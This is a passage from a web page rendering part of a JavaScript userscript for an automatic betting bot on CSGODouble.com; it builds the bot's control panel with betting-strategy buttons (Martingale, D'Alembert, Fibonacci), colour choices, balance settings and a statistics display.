blob-code-inner js-file-line\">\n<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L102\" class=\"blob-num js-line-number\" data-line-number=\"102\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC102\" class=\"blob-code blob-code-inner js-file-line\"> var menu = document.createElement(&#39;div&#39;);<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L103\" class=\"blob-num js-line-number\" data-line-number=\"103\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC103\" class=\"blob-code blob-code-inner js-file-line\"> menu.innerHTML = &#39;&#39; +<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L104\" class=\"blob-num js-line-number\" data-line-number=\"104\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC104\" class=\"blob-code blob-code-inner js-file-line\"> &#39;&lt;div class=&quot;row&quot;&gt;&#39; +<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L105\" class=\"blob-num js-line-number\" data-line-number=\"105\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC105\" class=\"blob-code blob-code-inner js-file-line\"> &#39;&lt;div class=&quot;col-lg-9&quot;&gt;&#39; +<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L106\" class=\"blob-num js-line-number\" data-line-number=\"106\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC106\" class=\"blob-code blob-code-inner js-file-line\"> &#39;&lt;h2&gt;CSGODouble.com PredictionBot/AutomaticBettingBot &lt;small&gt;by Billyam (1029416902342)&lt;/small&gt; &lt;i id=&quot;automated-theme-switch&quot; class=&quot;fa fa-lightbulb-o&quot; style=&quot;cursor: pointer;&quot;&gt;&lt;/i&gt;&lt;/h2&gt;&#39; +<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L107\" class=\"blob-num js-line-number\" data-line-number=\"107\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC107\" class=\"blob-code blob-code-inner js-file-line\"> &#39;&lt;div class=&quot;form-group&quot;&gt;&#39; +<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L108\" class=\"blob-num js-line-number\" data-line-number=\"108\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC108\" class=\"blob-code blob-code-inner js-file-line\"> &#39;&lt;div class=&quot;btn-group&quot;&gt;&#39; +<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L109\" class=\"blob-num js-line-number\" data-line-number=\"109\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC109\" class=\"blob-code blob-code-inner js-file-line\"> &#39;&lt;button type=&quot;button&quot; class=&quot;btn btn-success&quot; id=&quot;automated-start&quot; disabled&gt;Start&lt;/button&gt;&#39; +<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L110\" class=\"blob-num js-line-number\" data-line-number=\"110\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC110\" class=\"blob-code blob-code-inner js-file-line\"> &#39;&lt;button type=&quot;button&quot; class=&quot;btn btn-warning&quot; id=&quot;automated-stop&quot; disabled&gt;Pause&lt;/button&gt;&#39; +<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L111\" class=\"blob-num js-line-number\" data-line-number=\"111\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC111\" class=\"blob-code blob-code-inner js-file-line\"> &#39;&lt;button type=&quot;button&quot; class=&quot;btn btn-danger&quot; id=&quot;automated-abort&quot; disabled&gt;Abort&lt;/button&gt;&#39; +<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L112\" class=\"blob-num js-line-number\" data-line-number=\"112\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC112\" class=\"blob-code blob-code-inner js-file-line\"> &#39;&lt;/div&gt;&#39; +<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L113\" class=\"blob-num js-line-number\" data-line-number=\"113\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC113\" class=\"blob-code blob-code-inner js-file-line\"> &#39;&lt;/div&gt;&#39; +<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L114\" class=\"blob-num js-line-number\" data-line-number=\"114\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC114\" class=\"blob-code blob-code-inner js-file-line\"> &#39;&lt;div class=&quot;form-group&quot;&gt;&#39; +<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L115\" class=\"blob-num js-line-number\" data-line-number=\"115\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC115\" class=\"blob-code blob-code-inner js-file-line\"> &#39;&lt;div class=&quot;btn-group&quot;&gt;&#39; +<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L116\" class=\"blob-num js-line-number\" data-line-number=\"116\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC116\" class=\"blob-code blob-code-inner js-file-line\"> &#39;&lt;button type=&quot;button&quot; class=&quot;btn btn-default&quot; id=&quot;automated-martingale&quot; &#39; + (this.method === &#39;martingale&#39; ? &#39;disabled&#39; : &#39;&#39;) + &#39;&gt;Martingale&lt;/button&gt;&#39; +<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L117\" class=\"blob-num js-line-number\" data-line-number=\"117\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC117\" class=\"blob-code blob-code-inner js-file-line\"> &#39;&lt;button type=&quot;button&quot; class=&quot;btn btn-default&quot; id=&quot;automated-great-martingale&quot; &#39; + (this.method === &#39;great martingale&#39; ? &#39;disabled&#39; : &#39;&#39;) + &#39;&gt;Great Martingale&lt;/button&gt;&#39; +<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L118\" class=\"blob-num js-line-number\" data-line-number=\"118\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC118\" class=\"blob-code blob-code-inner js-file-line\"> &#39;&lt;button type=&quot;button&quot; class=&quot;btn btn-default&quot; id=&quot;automated-dalembert&quot; &#39; + (this.method === &#39;dalembert&#39; ? &#39;disabled&#39; : &#39;&#39;) + &#39;&gt;D\\&#39;alembert&lt;/button&gt;&#39; +<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L119\" class=\"blob-num js-line-number\" data-line-number=\"119\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC119\" class=\"blob-code blob-code-inner js-file-line\"> &#39;&lt;button type=&quot;button&quot; class=&quot;btn btn-default&quot; id=&quot;automated-bet-green&quot; &#39; + (this.method === &#39;green&#39; ? &#39;disabled&#39; : &#39;&#39;) + &#39;&gt;Green (Fibonacci)&lt;/button&gt;&#39; +<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L120\" class=\"blob-num js-line-number\" data-line-number=\"120\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC120\" class=\"blob-code blob-code-inner js-file-line\"> &#39;&lt;/div&gt;&#39; +<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L121\" class=\"blob-num js-line-number\" data-line-number=\"121\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC121\" class=\"blob-code blob-code-inner js-file-line\"> &#39;&lt;/div&gt;&#39; +<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L122\" class=\"blob-num js-line-number\" data-line-number=\"122\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC122\" class=\"blob-code blob-code-inner js-file-line\"> &#39;&lt;div class=&quot;form-group automated-hide-on-green&quot;&gt;&#39; +<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L123\" class=\"blob-num js-line-number\" data-line-number=\"123\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC123\" class=\"blob-code blob-code-inner js-file-line\"> &#39;&lt;div class=&quot;btn-group&quot;&gt;&#39; +<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L124\" class=\"blob-num js-line-number\" data-line-number=\"124\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC124\" class=\"blob-code blob-code-inner js-file-line\"> &#39;&lt;button type=&quot;button&quot; class=&quot;btn btn-default&quot; id=&quot;automated-red&quot; &#39; + (this.color === &#39;red&#39; ? &#39;disabled&#39; : &#39;&#39;) + &#39;&gt;Red&lt;/button&gt;&#39; +<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L125\" class=\"blob-num js-line-number\" data-line-number=\"125\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC125\" class=\"blob-code blob-code-inner js-file-line\"> &#39;&lt;button type=&quot;button&quot; class=&quot;btn btn-default&quot; id=&quot;automated-rainbow&quot; &#39; + (this.color === &#39;rainbow&#39; ? &#39;disabled&#39; : &#39;&#39;) + &#39;&gt;Rainbow&lt;/button&gt;&#39; +<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L126\" class=\"blob-num js-line-number\" data-line-number=\"126\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC126\" class=\"blob-code blob-code-inner js-file-line\"> &#39;&lt;button type=&quot;button&quot; class=&quot;btn btn-default&quot; id=&quot;automated-black&quot; &#39; + (this.color === &#39;black&#39; ? &#39;disabled&#39; : &#39;&#39;) + &#39;&gt;Black&lt;/button&gt;&#39; +<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L127\" class=\"blob-num js-line-number\" data-line-number=\"127\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC127\" class=\"blob-code blob-code-inner js-file-line\"> &#39;&lt;/div&gt;&#39; +<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L128\" class=\"blob-num js-line-number\" data-line-number=\"128\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC128\" class=\"blob-code blob-code-inner js-file-line\"> &#39;&lt;/div&gt;&#39; +<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L129\" class=\"blob-num js-line-number\" data-line-number=\"129\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC129\" class=\"blob-code blob-code-inner js-file-line\"> &#39;&lt;/div&gt;&#39; +<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L130\" class=\"blob-num js-line-number\" data-line-number=\"130\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC130\" class=\"blob-code blob-code-inner js-file-line\"> &#39;&lt;div class=&quot;col-lg-3&quot;&gt;&#39; +<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L131\" class=\"blob-num js-line-number\" data-line-number=\"131\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC131\" class=\"blob-code blob-code-inner js-file-line\"> &#39;&lt;h3&gt;Statistics&lt;/h3&gt;&#39; +<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L132\" class=\"blob-num js-line-number\" data-line-number=\"132\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC132\" class=\"blob-code blob-code-inner js-file-line\"> &#39;&lt;p&gt;&lt;b&gt;Wins:&lt;/b&gt; &lt;span id=&quot;automated-stats-wins&quot;&gt;&#39; + this.stats.wins + &#39;&lt;/span&gt;&lt;/p&gt;&#39; +<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L133\" class=\"blob-num js-line-number\" data-line-number=\"133\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC133\" class=\"blob-code blob-code-inner js-file-line\"> &#39;&lt;p&gt;&lt;b&gt;Loses:&lt;/b&gt; &lt;span id=&quot;automated-stats-loses&quot;&gt;&#39; + this.stats.loses + &#39;&lt;/span&gt;&lt;/p&gt;&#39; +<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L134\" class=\"blob-num js-line-number\" data-line-number=\"134\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC134\" class=\"blob-code blob-code-inner js-file-line\"> &#39;&lt;p&gt;&lt;b&gt;Balance:&lt;/b&gt; &lt;span id=&quot;automated-stats-balance&quot;&gt;&#39; + this.stats.balance + &#39;&lt;/span&gt;&lt;/p&gt;&#39; +<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L135\" class=\"blob-num js-line-number\" data-line-number=\"135\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC135\" class=\"blob-code blob-code-inner js-file-line\"> &#39;&lt;/div&gt;&#39; +<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L136\" class=\"blob-num js-line-number\" data-line-number=\"136\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC136\" class=\"blob-code blob-code-inner js-file-line\"> &#39;&lt;/div&gt;&#39; +<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L137\" class=\"blob-num js-line-number\" data-line-number=\"137\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC137\" class=\"blob-code blob-code-inner js-file-line\"> &#39;&lt;div class=&quot;form-group&quot;&gt;&#39; +<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L138\" class=\"blob-num js-line-number\" data-line-number=\"138\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC138\" class=\"blob-code blob-code-inner js-file-line\"> &#39;&lt;div class=&quot;input-group&quot;&gt;&#39; +<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L139\" class=\"blob-num js-line-number\" data-line-number=\"139\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC139\" class=\"blob-code blob-code-inner js-file-line\"> &#39;&lt;div class=&quot;input-group-addon&quot;&gt;Base value&lt;/div&gt;&#39; +<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L140\" class=\"blob-num js-line-number\" data-line-number=\"140\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC140\" class=\"blob-code blob-code-inner js-file-line\"> &#39;&lt;input type=&quot;number&quot; class=&quot;form-control&quot; placeholder=&quot;Calculating suggested value...&quot; id=&quot;automated-base-bet&quot; disabled&gt;&#39; +<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L141\" class=\"blob-num js-line-number\" data-line-number=\"141\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC141\" class=\"blob-code blob-code-inner js-file-line\"> &#39;&lt;/div&gt;&#39; +<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L142\" class=\"blob-num js-line-number\" data-line-number=\"142\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC142\" class=\"blob-code blob-code-inner js-file-line\"> &#39;&lt;/div&gt;&#39; +<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L143\" class=\"blob-num js-line-number\" data-line-number=\"143\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC143\" class=\"blob-code blob-code-inner js-file-line\"> &#39;&lt;div class=&quot;form-group&quot;&gt;&#39; +<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L144\" class=\"blob-num js-line-number\" data-line-number=\"144\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC144\" class=\"blob-code blob-code-inner js-file-line\"> &#39;&lt;div class=&quot;input-group&quot;&gt;&#39; +<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L145\" class=\"blob-num js-line-number\" data-line-number=\"145\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC145\" class=\"blob-code blob-code-inner js-file-line\"> &#39;&lt;div class=&quot;input-group-addon&quot;&gt;Keep balance above&lt;/div&gt;&#39; +<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L146\" class=\"blob-num js-line-number\" data-line-number=\"146\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC146\" class=\"blob-code blob-code-inner js-file-line\"> &#39;&lt;input type=&quot;number&quot; class=&quot;form-control&quot; value=&quot;0&quot; id=&quot;automated-min-balance&quot;&gt;&#39; +<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L147\" class=\"blob-num js-line-number\" data-line-number=\"147\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC147\" class=\"blob-code blob-code-inner js-file-line\"> &#39;&lt;/div&gt;&#39; +<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L148\" class=\"blob-num js-line-number\" data-line-number=\"148\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC148\" class=\"blob-code blob-code-inner js-file-line\"> &#39;&lt;/div&gt;&#39; +<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L149\" class=\"blob-num js-line-number\" data-line-number=\"149\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC149\" class=\"blob-code blob-code-inner js-file-line\"> &#39;&lt;div class=&quot;form-group automated-hide-on-green&quot;&gt;&#39; +<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L150\" class=\"blob-num js-line-number\" data-line-number=\"150\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC150\" class=\"blob-code blob-code-inner js-file-line\"> &#39;&lt;div class=&quot;input-group&quot;&gt;&#39; +<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L151\" class=\"blob-num js-line-number\" data-line-number=\"151\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC151\" class=\"blob-code blob-code-inner js-file-line\"> &#39;&lt;div class=&quot;input-group-addon&quot;&gt;Failsafe value&lt;/div&gt;&#39; +<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L152\" class=\"blob-num js-line-number\" data-line-number=\"152\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC152\" class=\"blob-code blob-code-inner js-file-line\"> &#39;&lt;input type=&quot;number&quot; class=&quot;form-control&quot; value=&quot;&#39; + this.safe_bet_amount + &#39;&quot; id=&quot;automated-safe-bet-amount&quot;&#39; + (!this.calculate_safe_bet ? &#39; disabled&#39; : &#39;&#39;) + &#39;&gt;&#39; +<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L153\" class=\"blob-num js-line-number\" data-line-number=\"153\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC153\" class=\"blob-code blob-code-inner js-file-line\"> &#39;&lt;/div&gt;&#39; +<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L154\" class=\"blob-num js-line-number\" data-line-number=\"154\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC154\" class=\"blob-code blob-code-inner js-file-line\"> &#39;&lt;/div&gt;&#39; +<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L155\" class=\"blob-num js-line-number\" data-line-number=\"155\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC155\" class=\"blob-code blob-code-inner js-file-line\"> &#39;&lt;div class=&quot;checkbox&quot;&gt;&#39; +<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L156\" class=\"blob-num js-line-number\" data-line-number=\"156\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC156\" class=\"blob-code blob-code-inner js-file-line\"> &#39;&lt;label&gt;&lt;input class=&quot;&quot; id=&quot;automated-stop-on-min-balance&quot; type=&quot;checkbox&quot; &#39; + (this.stop_on_min_balance ? &#39;checked&#39; : &#39;&#39;) + &#39;&gt; Stop on minimal balance (If checked the bot will stop after getting close to minimal balance, otherwise it will continue starting on base)&lt;/label&gt;&#39; +<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L157\" class=\"blob-num js-line-number\" data-line-number=\"157\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC157\" class=\"blob-code blob-code-inner js-file-line\"> &#39;&lt;/div&gt;&#39; +<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L158\" class=\"blob-num js-line-number\" data-line-number=\"158\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC158\" class=\"blob-code blob-code-inner js-file-line\"> &#39;&lt;div class=&quot;checkbox automated-hide-on-green&quot;&gt;&#39; +<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L159\" class=\"blob-num js-line-number\" data-line-number=\"159\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC159\" class=\"blob-code blob-code-inner js-file-line\"> &#39;&lt;label&gt;&lt;input class=&quot;&quot; id=&quot;automated-calculate-safe-bet&quot; type=&quot;checkbox&quot; &#39; + (this.calculate_safe_bet ? &#39;checked&#39; : &#39;&#39;) + &#39;&gt; Calculate base bet from given &quot;Failsafe value&quot;, the formula is [base bet] = floor( [balance] / 2 ^ ( [failsafe value] + 1) ) &lt;/label&gt;&#39; +<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L160\" class=\"blob-num js-line-number\" data-line-number=\"160\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC160\" class=\"blob-code blob-code-inner js-file-line\"> &#39;&lt;/div&gt;&#39; +<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L161\" class=\"blob-num js-line-number\" data-line-number=\"161\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC161\" class=\"blob-code blob-code-inner js-file-line\"> &#39;&lt;div class=&quot;checkbox&quot;&gt;&#39; +<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L162\" class=\"blob-num js-line-number\" data-line-number=\"162\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC162\" class=\"blob-code blob-code-inner js-file-line\"> &#39;&lt;label&gt;&lt;input class=&quot;&quot; id=&quot;automated-debug&quot; type=&quot;checkbox&quot; &#39; + (this.debug ? &#39;checked&#39; : &#39;&#39;) + &#39;&gt; Debug mode&lt;/label&gt;&#39; +<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L163\" class=\"blob-num js-line-number\" data-line-number=\"163\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC163\" class=\"blob-code blob-code-inner js-file-line\"> &#39;&lt;/div&gt;&#39; +<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L164\" class=\"blob-num js-line-number\" data-line-number=\"164\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC164\" class=\"blob-code blob-code-inner js-file-line\"> &#39;&lt;div class=&quot;checkbox&quot;&gt;&#39; +<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L165\" class=\"blob-num js-line-number\" data-line-number=\"165\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC165\" class=\"blob-code blob-code-inner js-file-line\"> &#39;&lt;label class=&quot;text-muted&quot;&gt;&lt;input id=&quot;automated-simulation&quot; type=&quot;checkbox&quot; &#39; + (this.simulation ? &#39;checked&#39; : &#39;&#39;) + &#39; disabled&gt; Simulation mode&lt;/label&gt;&#39; +<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L166\" class=\"blob-num js-line-number\" data-line-number=\"166\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC166\" class=\"blob-code blob-code-inner js-file-line\"> &#39;&lt;/div&gt;&#39;;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L167\" class=\"blob-num js-line-number\" data-line-number=\"167\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC167\" class=\"blob-code blob-code-inner js-file-line\"> document.getElementsByClassName(&#39;well&#39;)[1].appendChild(menu);<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L168\" class=\"blob-num js-line-number\" data-line-number=\"168\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC168\" class=\"blob-code blob-code-inner js-file-line\">\n<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L169\" class=\"blob-num js-line-number\" data-line-number=\"169\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC169\" class=\"blob-code blob-code-inner js-file-line\"> this.menu = {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L170\" class=\"blob-num js-line-number\" data-line-number=\"170\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC170\" class=\"blob-code blob-code-inner js-file-line\"> &#39;start&#39;: document.getElementById(&#39;automated-start&#39;),<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L171\" class=\"blob-num js-line-number\" data-line-number=\"171\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC171\" class=\"blob-code blob-code-inner js-file-line\"> &#39;stop&#39;: document.getElementById(&#39;automated-stop&#39;),<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L172\" class=\"blob-num js-line-number\" data-line-number=\"172\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC172\" class=\"blob-code blob-code-inner js-file-line\"> &#39;abort&#39;: document.getElementById(&#39;automated-abort&#39;),<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L173\" class=\"blob-num js-line-number\" data-line-number=\"173\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC173\" class=\"blob-code blob-code-inner js-file-line\"> &#39;basebet&#39;: document.getElementById(&#39;automated-base-bet&#39;),<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L174\" class=\"blob-num js-line-number\" data-line-number=\"174\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC174\" class=\"blob-code blob-code-inner js-file-line\"> &#39;minbalance&#39;: document.getElementById(&#39;automated-min-balance&#39;),<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L175\" class=\"blob-num js-line-number\" data-line-number=\"175\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC175\" class=\"blob-code blob-code-inner js-file-line\"> &#39;debug&#39;: document.getElementById(&#39;automated-debug&#39;),<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L176\" class=\"blob-num js-line-number\" data-line-number=\"176\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC176\" class=\"blob-code blob-code-inner js-file-line\"> &#39;simulation&#39;: document.getElementById(&#39;automated-simulation&#39;),<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L177\" class=\"blob-num js-line-number\" data-line-number=\"177\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC177\" class=\"blob-code blob-code-inner js-file-line\"> &#39;stoponminbalance&#39;: document.getElementById(&#39;automated-stop-on-min-balance&#39;),<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L178\" class=\"blob-num js-line-number\" data-line-number=\"178\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC178\" class=\"blob-code blob-code-inner js-file-line\"> &#39;red&#39;: document.getElementById(&#39;automated-red&#39;),<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L179\" class=\"blob-num js-line-number\" data-line-number=\"179\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC179\" class=\"blob-code blob-code-inner js-file-line\"> &#39;black&#39;: document.getElementById(&#39;automated-black&#39;),<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L180\" class=\"blob-num js-line-number\" data-line-number=\"180\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC180\" class=\"blob-code blob-code-inner js-file-line\"> &#39;rainbow&#39;: document.getElementById(&#39;automated-rainbow&#39;),<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L181\" class=\"blob-num js-line-number\" data-line-number=\"181\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC181\" class=\"blob-code blob-code-inner js-file-line\"> &#39;statistics&#39;: {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L182\" class=\"blob-num js-line-number\" data-line-number=\"182\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC182\" class=\"blob-code blob-code-inner js-file-line\"> &#39;wins&#39;: 